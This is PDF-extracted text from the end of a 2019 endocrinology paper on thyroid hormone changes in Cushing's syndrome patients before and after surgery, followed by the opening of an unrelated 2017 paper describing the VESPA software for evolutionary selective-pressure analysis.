± 7.8 44.1 ± 17.1a / TSH (mIU/L) 1.07 ± 0.82 0.65 ± 0.51 0.70 ± 0.79 0.55~4.78 T3 (nmol/L) 1.10 ± 0.38 1.12 ± 0.69 0.85 ± 0.31 1.23~3.39 T4 (nmol/L) 79.0 ± 19.0 72.6 ± 15.4 68.4 ± 35.1 54.0~174.0 FT3 (pmol/L) 3.68 ± 0.68b 3.32 ± 0.53 2.93 ± 0.76b 3.50~6.50 FT4 (pmol/L) 13.9 ± 2.8b 12.6 ± 2.6 11.4 ± 1.6b 11.5~22.7 aSerum cortisol of EAS was significantly higher than that of adrenocortical adenoma (P = 0.04) and CD (P = 0.001). bFT3 (P = 0.009) and FT4 (P = 0.035) in EAS were significantly lower than those in CD. Figure 1 Comparison between remission (n = 81) and non-remission (n = 21) groups in CD patients before and 3 months after surgery. In the remission group, compared to those before surgery: serum cortisol level (A) dropped significantly; TSH (P = 0.000), T3 (P = 0.000), T4 (P = 0.000) and FT3 (P = 0.000) (panel (B, C, D and E)) showed significant increase; FT4 (F) slightly decreased after surgery (P = 0.012). Neither serum cortisol nor thyroid hormones showed notable difference before surgery between remission and non-remission group. Three months after surgery, with the reduction of serum cortisol in remission group, TSH (B), T3 (C) and FT3 (E) became significantly lower than those in the non- remission group (P = 0.000 for all three indexes). FT4 (F) levels in remission group were significantly lower than those in the non-remission group in the third month postoperative evaluation (P = 0.004). The gray bands in panel (B, C, D, E and F) represent the reference range values. The lines represent mean values (±s.d.). *P < 0.05, **P < 0.01. before surgery 3 months after surgery remission non-resmission 0 20 40 60 80 se ru m co rt is ol (u g/ dl ) * * * * A remission non-resmission 0 1 2 3 4 5 TT 3 (n m ol /L ) * * * *C remission non-resmission 0 5 10 15 FT 3 (p m ol /L ) * * * * E remission non-resmission 0 2 4 6 8 10 TS H (m IU /L ) * * * *B remission non-resmission 0 50 100 150 200 TT 4 (n m ol /L ) * * D remission non-resmission 0 10 20 30 FT 4 (p m ol /L ) F * * * This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:22PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com B Xiang, R Tao et al. Thyroid functions in Cushing’s syndrome 11808:8 were not significant, except for FT4’s transient decrease on the second month. In the 28 patients of the remission group undergoing 1-year follow-up (Fig. 3), serum cortisol level markedly dropped after surgery. The median dose of cortisone acetate for post-surgery, 3rd-month, 6th-month and 12th-month replacement treatment were 50.0 mg/day (0~75.0 mg/day), 25.0 mg/day (0~75.0 mg/day), 3.125 mg/day (0~62.5 mg/day) and 0 mg/day (0~25.0 mg/day). The proportion of patients receiving cortisone replacement for post-surgery day, 3rd month, 6th month and 12th month were 85.7, 67.9, 32.1 and 14.3% separately. Compared to those before surgery, TSH, T3 and FT3 showed constant significant increase postoperatively. Elevated TSH above the reference range was found in two, four and three patients on the 3rd, 6th and 12th month. High T3 was seen in only three patients on the third month and then all returned to normal in the 6th- and 12th-month evaluation. Abnormally elevated FT3 was seen in six patients on the 3rd month, two on the 6th month and then only one by 12 months. FT4 level dropped on the 3rd and 6th months but returned to no difference from the baseline level by 12 months. The alternation of T4 was not notable, with 96.4% (27/28) of patients in the remission group constantly maintaining normal T4 level. Overall TPO-Ab and ATG showed no significant change during the 1-year follow-up. Discussion The changes of thyroid hormone in hypercortisolemia have been studied for 60 years. The results of previous studies were limited by small sample sizes and incomplete thyroid hormone indexes (8, 9). We investigated thyroid function indexes (including TSH, T3, T4, FT3 and FT4) in 118 CS patients, which, to date, was the largest sample. We found that in the 118 CS patients, the incidence of low TSH, T3 and FT3 was relatively high (TSH, 31%; T3, 69%; FT3, 44%) before treatment. Besides, none of the thyroid function indexes was above the reference range in active CS. In addition, this is also the first report comparing thyroid hormones among CD, adrenal CS and EAS. We found that the levels of FT3 and FT4 in EAS group, who bore the highest serum cortisol level, were lower than those in CD and adrenal CS. Therefore, we recommend Table 3 Serum cortisol and thyroid functions of 102 CD patients before and 3 months after surgery. Remission group (n = 81) Non-remission group (n = 21) Pc PdBefore surgery 3 months after surgery Pa Before surgery 3 months after surgery Pb Serum cortisol (μg/dL) 29.2 ± 9.9 4.4 ± 3.3 0.000 30.0 ± 11.2 27.7 ± 11.6 0.394 0.773 0.000 TSH (mIU/L) 1.07 ± 0.82 2.42 ± 1.73 0.000 1.08 ± 0.84 1.19 ± 0.97 0.443 0.977 0.000 T3 (nmol/L) 1.08 ± 0.31 2.09 ± 0.77 0.000 1.15 ± 0.61 1.16 ± 0.39 0.977 0.535 0.000 T4 (nmol/L) 80.2 ± 18.4 93.1 ± 23.3 0.000 76.6 ± 18.7 91.5 ± 24.5 0.093 0.202 0.668 FT3 (pmol/L) 3.70 ± 0.66 5.37 ± 1.37 0.000 3.63 ± 0.78 3.79 ± 0.91 0.257 0.680 0.000 FT4 (pmol/L) 13.8 ± 2.8 12.9 ± 2.7 0.012 14.3 ± 2.9 14.8 ± 2.7 0.370 0.499 0.004 aComparison between hormones before and 3 months after surgery in remission group. bComparison between hormones before and 3 months after surgery in the non-remission group. cComparison between remission and non-remission group before surgery. dComparison between remission and non-remission group 3 months after surgery. Table 4 Correlations between serum cortisol and thyroid hormones. R P Before surgery (n = 112)a Serum cortisol TSH −0.458d 0.000 T3 −0.358d 0.000 T4 −0.225c 0.017 FT3 −0.449d 0.000 FT4 −0.242d 0.009 Three months after surgery (n = 102)b Serum cortisol TSH −0.343d 0.000 T3 −0.472d 0.000 T4 −0.076 0.457 FT3 −0.477d 0.000 FT4 0.216c 0.029 aCorrelations between thyroid hormones and serum cortisol levels were analyzed in all the patients with CS (n = 112) before surgery. bCorrelations between thyroid hormones and serum cortisol levels were analyzed in all the patients with CD (n = 102) after surgery. cP < 0.05, dP < 0.01. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:22PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com B Xiang, R Tao et al. Thyroid functions in Cushing’s syndrome 1181 PB–10 8:8 testing for CS in patients with low thyroid hormones and low TSH. In the 102 CD patients, the remission group had higher TSH, T3 and FT3 levels than the non-remission group on the third month after surgery. In the remission group, 11.1% (9/81) TSH, 4.9% (4/81) T3 and 17.3% (14/81) FT3 were above the reference range. Moreover, 14.8% (12/81) of patients in the remission group exhibited elevated thyroid hormones (T3, FT3 and FT4) with nonsuppressed TSH. Within the 3-month monitoring of the nine CD patients in remission group, we observed that TSH increased immediately 1 day after surgery and the increase started to exhibit significance since the second week postoperatively. T3 and FT3 levels went down 1 day after surgery and then rose up to markedly higher levels. Clinicians should be careful not to misdiagnose these conditions as hyperthyroidism and we recommend testing for thyroid function after surgery in patients with CD. It is well known that glucocorticoids exert an inhibitory action on the hypothalamic–pituitary–thyroid axis (3, 5). Previous reports documented that glucocorticoids decreased the release of TRH and TSH in the hypothalamic and pituitary (11, 12, 13, 14, 15, 16), and increased type 2 deiodinase (D2) activity, which was known to mainly convert T4 to T3 in the central nervous system, and eventually suppressed TSH and thyroid hormone (T3 and T4) secretion (17, 18). The glucocorticoids also decreased type 1 deiodinase (D1), known to convert serum T4 to T3 (17), and that possibly explains the relatively normal T4 and FT4 concentrations in active CS. There have been few studies showing the correlation between serum cortisol and thyroid hormones (19). In our study, we found significant negative correlations between thyroid hormones (TSH, T3 and FT3) and cortisol levels both before and after surgery. In the remission group, as the glucocorticoid concentration went down, TSH, T3 and FT3 increased significantly. TSH’s immediate increase after surgery was very likely to be caused by reduced D2 activity in the central nervous system. The mechanism of high T3 and FT3 might be the rise of TSH level and D1 activity in the periphery. A previous study reported elevated FT3 with unsuppressed TSH in CS patients 1 month after surgery (9). They recruited eight patients and measured TSH, FT3 and FT4 only at 1st, 3rd, 6th and 12th month. Our study included closer monitoring of patients’ thyroid function postoperatively and we found that TSH increased immediately after surgery. T3 and FT3 went down on the first day after surgery and then rose up notably. The transient decrease of T3 and FT3 may be explained by ‘low- T3 syndrome’ resulting from surgery stress. Throughout our 1-year follow-up, T4 did not fluctuate as notably as TSH, T3 and FT3 did, and 96.4% (27/28) of patients in the remission group constantly maintained normal T4 level. This may be due to increased conversion from T4 to T3 in the periphery. Space-occupying lesion of the pituitary is the most common cause of central hypothyroidism, which is defined as low thyroid hormones in conjunction with a low or inappropriately normal TSH level. However, microadenomas are commonly thought unlikely to compromise pituitary functions (20). As is known, microadenomas are quite common in CD. Nestoras Mathioudakis reported (21) that the prevalence of central hypothyroidism was higher in ACTH micros (18%) compared with prolactin micros (1%) and nonfunctioning adenomas (NFAs) (0%). Nevertheless, they found no correlation between free T4 or TSH and the degree of hypercortisolism in that study. In our study, we found no correlation between tumor size and thyroid Table 5 Significant determinants of thyroid hormones in CD (n = 102) with variable parameters in multiple regression analysis. Dependent variables Independent variables Unstandardized coefficients Standardized coefficients P 95% CIB Beta Before surgery TSH F −0.032 −0.335 0.001 (1.512, 2.675) T3 F −0.011 −0.361 0.000 (−0.017, −0.005) BMI 0.021 0.281 0.005 (0.007, 0.035) FT3 F −0.030 −0.447 0.000 (−0.042, −0.018) Age −0.013 −0.225 0.015 (−0.023, −0.003) BMI 0.028 0.183 0.047 (0.000, 0.056) FT4 Age −0.058 −0.236 0.025 (−0.109, −0.008) After surgery TSH F −0.054 −0.356 0.003 (−0.089, −0.020) T3 F −0.034 −0.493 0.000 (−0.050, −0.019) FT3 F −0.065 −0.531 0.000 (−0.090, −0.040) Parameters analyzed included serum cortisol levels, BMI, gender, age and tumor size (in postoperative analyses, tumor size was excluded). F: serum cortisol. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:22PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com B Xiang, R Tao et al. Thyroid functions in Cushing’s syndrome 11828:8 hormone/serum cortisol. Marked correlations between thyroid hormones and serum cortisol were observed. All patients received transsphenoidal surgery at the same clinic by an experienced surgeon. Therefore, we considered that the changes of thyroid hormones in CD were related to serum cortisol alternation, rather than surgery. Normalization of hypercortisolism of CS is associated with the induction of autoimmunity (22). Some studies attributed the high TSH with/without low FT4 to exacerbation of underlying autoimmune disease along with the decline of serum cortisol concentration, sometimes accompanied by the increased titer of antithyroid antibodies (23, 24). In our 1-year follow-up (n = 28), TSH, T3 and FT3 levels significantly rose up after surgery in the remission group. FT4 levels decreased on the third and sixth months. Moreover, in the hormone evaluation of all the CD patients (n = 102), we found that FT4 in the remission group (n = 81) became significantly lower after surgery. Also, the postoperative FT4 in the remission group (n = 81) was lower than that in the non- remission group (n = 21) on the third month. This may be due to transiently increased conversion from T4 to T3 along with the disinhibition of D1. Furthermore, we find no significant fluctuation of anti-thyroperoxidase antibodies or antithyroglobulin antibodies by 1 year after surgery. Therefore, for now, we hold the view that Figure 2 Changes in thyroid function in nine CD patients in the remission group within 3 months after surgery. Serum cortisol (A) markedly dropped after surgery. Panel (B) shows the daily doses of cortisone acetate within 3 months in the nine patients postoperatively. Two of the nine patients received no cortisone replacement after surgery TSH (C), T3 (D), and FT3 (F) showed a significant increase. T4 (E) and FT4 (G) showed no significant change except for the FT4’s decrease on the second month. The gray bands in panels C, D, E, F and G represent the reference range values. The lines represent mean values (±s.d.) in panel (C, D, E, F and G). be fo re po st su rg er y 2w 1m 2m 3m 0 20 40 60 se ru m co rt is ol (u g/ dl ) 1 2 3 4 5 6 7 8 9 A po st su rg er y 2w 1m 2m 3m 0 20 40 60 80 do se of co rt is on e ac et at e (m g/ d) 1 2 3 4 5 6 7 8 9 B before 1 d 2 w 1 m 2 m 3 m 0 2 4 6 8 TS H (m IU /L ) p=0.009 p=0.017 p=0.000 p=0.029C before 1 d 2 w 1 m 2 m 3 m 0 1 2 3 4 TT 3 (n m ol /L ) p=0.015 p=0.019 p=0.006D p=0.019 before 1 d 2 w 1 m 2 m 3 m 0 50 100 150 200 TT 4 (n m ol /L ) E before 1 d 2 w 1 m 2 m 3 m 0 2 4 6 8 FT 3 (p m ol /L ) p=0.001 p=0.000 p=0.009F before 1 d 2 w 1 m 2 m 3 m 0 5 10 15 20 25 FT 4 (p m ol /L ) G p=0.01 This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:22PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com B Xiang, R Tao et al. Thyroid functions in Cushing’s syndrome 1183 PB–10 8:8 high TSH with low FT4 after remission of CD is caused by the reduction of serum cortisol, and it should not be defined as primary hypothyroidism. However, as previous studies showed the elevation of thyroid autoantibodies could occur from the second month to the eighth year after surgery (24), further follow-up should be needed for the thyroid autoantibodies to exhibit probable significant alternation. Figure 3 Changes in thyroid hormones, TSH and antithyroid autoantibodies in 28 CD patients in the remission group by 12 months after surgery. Serum cortisol (A) dropped immediately after surgery and then gradually increased. The median dose of cortisone acetate (B) for post-surgery, 3rd-month, 6th-month and 12th-month replacement treatment were 50.0 mg/day, 25.0 mg/day, 3.125 mg/day and 0 mg/day. The proportion of patients receiving cortisone replacement for post-surgery day, 3rd month, 6th month and 12th month were 85.7, 67.9, 32.1 and 14.3% separately. TSH (C), T3 (D) and FT3 (F) showed a significant increase in all the postoperative evaluation. FT4 (G) transiently decreased on the third and sixth month but returned to no difference from the baseline level by 12 months. T4 (E) and antithyroid autoantibodies did not change significantly by 12 months after surgery. The gray bands in panel (C, D, E, F, G, H and I) represent the reference range values. The lines respectively represent median (minimum–maximum) in panel (B), and mean values (±s.d.) in panel (A) and (C, D, E, F, G, H and I). before 3m 6m 12m 0 10 20 30 40 se ru m co rt is ol (u g/ dl ) A p=0.000 p=0.000 p=0.000 post surgery 3m 6m 12m 0 20 40 60 80 da ily do se of co rt is on e ac et at e (m g/ d) B before 3m 6m 12m 0 2 4 6 8 TS H (m IU /L ) C p=0.000 p=0.001 p=0.001 before 3m 6m 12m 0 1 2 3 4 TT 3 (n m ol /L ) D p=0.000 p=0.000 p=0.000 before 3m 6m 12m 0 50 100 150 200 TT 4 (n m ol /L ) E before 3m 6m 12m 0 2 4 6 8 FT 3 (p m ol /L ) F p=0.000 p=0.000 p=0.001 before 3m 6m 12m 0 5 10 15 20 25 FT 4 (p m ol /L ) G p=0.012 p=0.039 before 3m 6m 12m 40 60 80 TP O -A b (U /m l) H before 3m 6m 12m 20 40 60 80 A TG (U /m l) I This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:22PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com B Xiang, R Tao et al. Thyroid functions in Cushing’s syndrome 11848:8 Limitation The changes of thyroid functions of adrenal adenoma and EAS after surgery were not elucidated. Conclusion Our study revealed the inhibitory action of endogenous hypercortisolemia on hypothalamic–pituitary–thyroid (HPT) axis, in which TSH, T3 and FT3 levels were suppressed. There were negative correlations between serum cortisol and thyroid hormones (TSH, T3 and FT3). After remission of CD, TSH, T3 and FT3 increased significantly, even above the reference range, and mostly returned to normal 1 year after surgery. The changes of thyroid hormones in CD were associated with serum cortisol alternation, not surgery. Antithyroid antibodies showed no significant change after remission of CD. We recommend testing for CS in patients with low thyroid hormones and low TSH. In addition, post-treatment CD patients with high TSH and T3 should be carefully investigated so as not to be misdiagnosed with hyperthyroidism. The molecular mechanism of the changes of thyroid functions after remission of CD is not fully elucidated. Declaration of interest The authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. Funding This research did not receive any specific grant from any funding agency in the public, commercial or not-for-profit sector. Author contribution statement Hongying Ye designed the research; Boni Xiang, Ran Tao, Xinhua Liu, Min He, Xiaoming Zhu, Yiming Li, Zhenwei Yao, Yongfei Wang, Zengyi Ma, and Hongying Ye diagnosed, treated, followed the patients; Boni Xiang, Ran Tao and Hongying Ye analyzed the data, wrote and edited the manuscript. Acknowledgments The authors acknowledge the collaboration of the patients and all the doctors involved in the diagnosis and treatment. References 1 Nieman LK, Biller BM, Findling JW, Newell-Price J, Savage MO, Stewart PM & Montori VM. The diagnosis of Cushing’s syndrome: an Endocrine Society Clinical Practice Guideline. Journal of Clinical Endocrinology and Metabolism 2008 93 1526–1540. (https://doi. org/10.1210/jc.2008-0125) 2 Lacroix A, Feelders RA, Stratakis CA & Nieman LK. Cushing’s syndrome. Lancet 2015 386 913–927. (https://doi.org/10.1016/ S0140-6736(14)61375-1) 3 Fredrickson DS, Forsham PH & Thorn GW. The effect of massive cortisone therapy on measurements of thyroid function. Journal of Clinical Endocrinology and Metabolism 1952 12 541–553. (https://doi. org/10.1210/jcem-12-5-541) 4 Re RN, Kourides IA, Ridgway EC, Weintraub BD & Maloof F. The effect of glucocorticoid administration on human pituitary secretion of thyrotropin and prolactin. Journal of Clinical Endocrinology and Metabolism 1976 43 338–346. (https://doi.org/10.1210/jcem-43-2- 338) 5 Otsuki M, Dakoda M & Baba S. Influence of glucocorticoids on TRF- induced TSH response in man. Journal of Clinical Endocrinology and Metabolism 1973 36 95–102. (https://doi.org/10.1210/jcem-36-1-95) 6 Kuku SF, Child DF, Nader S & Fraser TR. Thyrotrophin and prolactin responsiveness to thyrotrophin releasing hormone in Cushing’s disease. Clinical Endocrinology 1975 4 437–442. (https://doi. org/10.1111/j.1365-2265.1975.tb01551.x) 7 Barnett AH, Donald RA & Espiner EA. High concentrations of thyroid-stimulating hormone in untreated glucocorticoid deficiency: indication of primary hypothyroidism? BMJ 1982 285 172–173. (https://doi.org/10.1136/bmj.285.6336.172-a) 8 Tamada D, Onodera T, Kitamura T, Yamamoto Y, Hayashi Y, Murata Y, Otsuki M & Shimomura I. Hyperthyroidism due to thyroid-stimulating hormone secretion after surgery for Cushing’s syndrome: a novel cause of the syndrome of inappropriate secretion of thyroid-stimulating hormone. Journal of Clinical Endocrinology and Metabolism 2013 98 2656–2662. (https://doi.org/10.1210/jc.2013- 2135) 9 Tamada D, Kitamura T, Onodera T, Hamasaki T, Otsuki M & Shimomura I. Clinical significance of fluctuations in thyroid hormones after surgery for Cushing’s syndrome. Endocrine Journal 2015 62 805–810. (https://doi.org/10.1507/endocrj.EJ15-0001) 10 Nieman LK, Biller BM, Findling JW, Murad MH, Newell-Price J, Savage MO, Tabarin A & Endocrine Society. Treatment of Cushing’s syndrome: an Endocrine Society clinical practice guideline. Journal of Clinical Endocrinology and Metabolism 2015 100 2807–2831. (https:// doi.org/10.1210/jc.2015-1818) 11 Estupina C, Belmar J, TapiaArancibia L, Astier H & Arancibia S. Rapid and opposite effects of dexamethasone on in vivo and in vitro hypothalamic somatostatin release. Experimental Brain Research 1997 113 337–342. (https://doi.org/10.1007/bf02450331) 12 Nakagawa K, Ishizuka T, Shimizu C, Ito Y & Wakabayashi I. Increased hypothalamic somatostatin messenger-RNA following dexamethasone administration in rats. Acta Endocrinologica 1992 127 416–419. (https://doi.org/10.1530/acta.0.1270416) 13 Cintra A, Fuxe K, Wikstrom AC, Visser T & Gustafsson JA. Evidence for thyrotropin-releasing-hormone and glucocorticoid receptor- immunoreactive neurons in various preoptic and hypothalamic nuclei of the male-rat. Brain Research 1990 506 139–144. (https://doi. org/10.1016/0006-8993(90)91210-8) 14 Kakucska I, Qi YP & Lechan RM. Changes in adrenal status affect hypothalamic thyrotropin-releasing-hormone gene-expression in parallel with corticotropin-releasing hormone. Endocrinology 1995 136 2795–2802. (https://doi.org/10.1210/endo.136.7.7789304) 15 Perez-Martinez L, Carreon-Rodriguez A, Gonzalez-Alzati ME, Morales C, Charli JL & Joseph-Bravo P. Dexamethasone rapidly regulates TRH mRNA levels in hypothalamic cell cultures: interaction with the cAMP pathway. Neuroendocrinology 1998 68 345–354. (https://doi.org/10.1159/000054383) 16 Alkemade A, Unmehopa UA, Wiersinga WM, Swaab DF & Fliers E. Glucocorticoids decrease thyrotropin-releasing hormone messenger ribonucleic acid expression in the paraventricular nucleus of the human hypothalamus. Journal of Clinical Endocrinology and Metabolism 2005 90 323–327. (https://doi.org/10.1210/jc.2004-1430) This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:22PM via free access https://doi.org/10.1210/jc.2008-0125 https://doi.org/10.1210/jc.2008-0125 https://doi.org/10.1016/S0140-6736(14)61375-1 https://doi.org/10.1016/S0140-6736(14)61375-1 https://doi.org/10.1210/jcem-12-5-541 https://doi.org/10.1210/jcem-12-5-541 https://doi.org/10.1210/jcem-43-2-338 https://doi.org/10.1210/jcem-43-2-338 https://doi.org/10.1210/jcem-36-1-95 https://doi.org/10.1111/j.1365-2265.1975.tb01551.x https://doi.org/10.1111/j.1365-2265.1975.tb01551.x https://doi.org/10.1136/bmj.285.6336.172-a https://doi.org/10.1210/jc.2013-2135 https://doi.org/10.1210/jc.2013-2135 https://doi.org/10.1507/endocrj.EJ15-0001 https://doi.org/10.1210/jc.2015-1818 https://doi.org/10.1210/jc.2015-1818 https://doi.org/10.1007/bf02450331 https://doi.org/10.1530/acta.0.1270416 https://doi.org/10.1016/0006-8993(90)91210-8 https://doi.org/10.1016/0006-8993(90)91210-8 https://doi.org/10.1210/endo.136.7.7789304 https://doi.org/10.1159/000054383 https://doi.org/10.1210/jc.2004-1430 https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com B Xiang, R Tao et al. Thyroid functions in Cushing’s syndrome 1185 PB–10 8:8 17 Chiamolera MI & Wondisford FE. Minireview: thyrotropin- releasing hormone and the thyroid hormone feedback mechanism. Endocrinology 2009 150 1091–1096. (https://doi.org/10.1210/ en.2008-1795) 18 Coppola A, Meli R & Diano S. Inverse shift in circulating corticosterone and leptin levels elevates hypothalamic deiodinase type 2 in fasted rats. Endocrinology 2005 146 2827–2833. (https://doi. org/10.1210/en.2004-1361) 19 Kitahara H, Imai Y, Yamauchi K, Tomita A & Mizuno S. Pituitary- thyroid function in patients with Cushing’s syndrome – comparative study before and after extirpation of adrenal cortex tumor. Nihon Naibunpi Gakkai Zasshi 1983 59 1086–1098. (https://doi.org/10.1507/ endocrine1927.59.8_1086) 20 Freda PU, Beckers AM, Katznelson L, Molitch ME, Montori VM, Post KD, Vance ML & Endocrine Society. Pituitary incidentaloma: an Endocrine Society clinical practice guideline. Journal of Clinical Endocrinology and Metabolism 2011 96 894–904. (https://doi. org/10.1210/jc.2010-1048) 21 Mathioudakis N, Thapa S, Wand GS & Salvatori R. ACTH-secreting pituitary microadenomas are associated with a higher prevalence of central hypothyroidism compared to other microadenoma types. Clinical Endocrinology 2012 77 871–876. (https://doi.org/10.1111/ j.1365-2265.2012.04442.x) 22 da Mota F, Murray C & Ezzat S. Overt immune dysfunction after Cushing’s syndrome remission: a consecutive case series and review of the literature. Journal of Clinical Endocrinology and Metabolism 2011 96 E1670–E1674. (https://doi.org/10.1210/jc.2011-1317) 23 Sahoo JP, Selviambigapathy J, Kamalanathan S, Nagarajan K & Vivekanandan M. Effect of steroid replacement on thyroid function and thyroid autoimmunity in Addison’s disease with primary hypothyroidism. Indian Journal of Endocrinology and Metabolism 2016 20 162–166. (https://doi.org/10.4103/2230-8210.176356) 24 Niepomniszcze H, Pitoia F, Katz SB, Chervin R & Bruno OD. Primary thyroid disorders in endogenous Cushing’s syndrome. European Journal of Endocrinology 2002 147 305–311. (https://doi.org/10.1530/ eje.0.1470305) Received in final form 21 June 2019 Accepted 23 July 2019 Accepted Preprint published online 23 July 2019 This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:22PM via free access https://doi.org/10.1210/en.2008-1795 https://doi.org/10.1210/en.2008-1795 https://doi.org/10.1210/en.2004-1361 https://doi.org/10.1210/en.2004-1361 https://doi.org/10.1507/endocrine1927.59.8_1086 https://doi.org/10.1507/endocrine1927.59.8_1086 https://doi.org/10.1210/jc.2010-1048 https://doi.org/10.1210/jc.2010-1048 https://doi.org/10.1111/j.1365-2265.2012.04442.x https://doi.org/10.1111/j.1365-2265.2012.04442.x https://doi.org/10.1210/jc.2011-1317 https://doi.org/10.4103/2230-8210.176356 https://doi.org/10.1530/eje.0.1470305 https://doi.org/10.1530/eje.0.1470305 https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com Abstract Introduction Patients and methods Patients Methods Hormonal assays Statistical analyses Ethical approval Results Discussion Limitation Conclusion Declaration of interest Funding Author contribution statement Acknowledgments References work_knwdputcjze7viktx5uhxwuuke ---- Submitted 25 March 2016 Accepted 9 May 2017 Published 5 June 2017 Corresponding author Mary J. O’Connell, m.oconnell@leeds.ac.uk Academic editor James Procter Additional Information and Declarations can be found on page 13 DOI 10.7717/peerj-cs.118 Copyright 2017 Webb et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS VESPA: Very large-scale Evolutionary and Selective Pressure Analyses Andrew E. Webb1, Thomas A. Walsh1 and Mary J. O’Connell1,2 1 Bioinformatics and Molecular Evolution Group, School of Biotechnology, Faculty of Science and Health, Dublin City University, Dublin, Ireland 2 Computational and Molecular Evolutionary Biology Group, School of Biology, Faculty of Biological Sciences, The University of Leeds, Leeds, United Kingdom ABSTRACT Background. Large-scale molecular evolutionary analyses of protein coding sequences requires a number of preparatory inter-related steps from finding gene families, to generating alignments and phylogenetic trees and assessing selective pressure variation. Each phase of these analyses can represent significant challenges, particularly when working with entire proteomes (all protein coding sequences in a genome) from a large number of species. Methods. We present VESPA, software capable of automating a selective pressure analysis using codeML in addition to the preparatory analyses and summary statistics. VESPA is written in python and Perl and is designed to run within a UNIX environment. Results. We have benchmarked VESPA and our results show that the method is consistent, performs well on both large scale and smaller scale datasets, and produces results in line with previously published datasets. Discussion. Large-scale gene family identification, sequence alignment, and phylogeny reconstruction are all important aspects of large-scale molecular evolutionary analyses. VESPA provides flexible software for simplifying these processes along with down- stream selective pressure variation analyses. The software automatically interprets results from codeML and produces simplified summary files to assist the user in better understanding the results. VESPA may be found at the following website: http://www.mol-evol.org/VESPA. Subjects Bioinformatics, Computational Biology Keywords Selective pressure analysis, Protein molecular evolution, Large-scale comparative genomics, Gene family evolution, Positive selection INTRODUCTION Estimating selective pressure variation across homologous protein-coding genes from different species is typically done by assessing the ratio of dN/dS, i.e., the number of non-synonymous substitutions per non-synonymous site (dN) as a function of the number of synonymous substitutions per synonymous site (dS). The ratio of dN/dS is commonly referred to as omega (ω), and is routinely used to assess selective pressure variation or constraints across protein families or protein-interaction networks (Kim, Korbel & Gerstein, 2007; Kosiol et al., 2008; Alvarez-Ponce, Aguade & Rozas, 2009). These calculations of selective pressure variation are performed on alignments of protein coding sequences (and not on other data types such as raw reads from NGS experiments). Codeml How to cite this article Webb et al. (2017), VESPA: Very large-scale Evolutionary and Selective Pressure Analyses. PeerJ Comput. Sci. 3:e118; DOI 10.7717/peerj-cs.118 https://peerj.com mailto:m.oconnell@leeds.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.118 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://www.mol-evol.org/VESPA http://dx.doi.org/10.7717/peerj-cs.118 is part of the PAML package for the analyses of selective pressure variation in nucleotide sequence data in a maximum likelihood framework (Yang, 2007). The models available in PAML for assessing selective pressure variation can simultaneously compare variation across sites and across lineages in the homologous protein coding gene dataset. In this way the ‘‘foreground lineage’’ is compared to all other lineages in the dataset in an attempt to determine lineage specific selective pressure variation. Some well-known examples of selective pressure variation on foreground lineages include the identification of positive selection in reproductive proteins that contribute to species divergence in mammals (Swanson et al., 2001), and the identification of molecular signatures of positive selection that govern protein functional divergence in a group of mammal enzymes (Loughran et al., 2012). A number of software packages estimate selective pressure variation (Pond, Frost & Muse, 2005; Yang, 2007; Delport et al., 2010). One of the most popular 